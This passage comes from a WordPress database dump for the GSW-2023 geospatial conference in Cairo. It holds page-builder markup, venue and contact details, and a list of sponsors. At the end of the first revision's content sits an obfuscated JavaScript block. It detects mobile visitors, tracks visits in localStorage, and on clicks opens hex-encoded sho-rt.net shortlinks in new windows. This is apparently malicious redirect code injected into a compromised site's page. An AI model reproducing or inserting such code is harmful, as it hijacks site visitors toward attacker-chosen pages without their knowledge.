css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:39:10','2023-05-17 05:39:10','',3066,'https://gsw2023.com/?p=4531',0,'revision','',0),
(4532,1,'2023-05-17 05:42:06','2023-05-17 05:42:06','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column width=\"1/2\"][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" 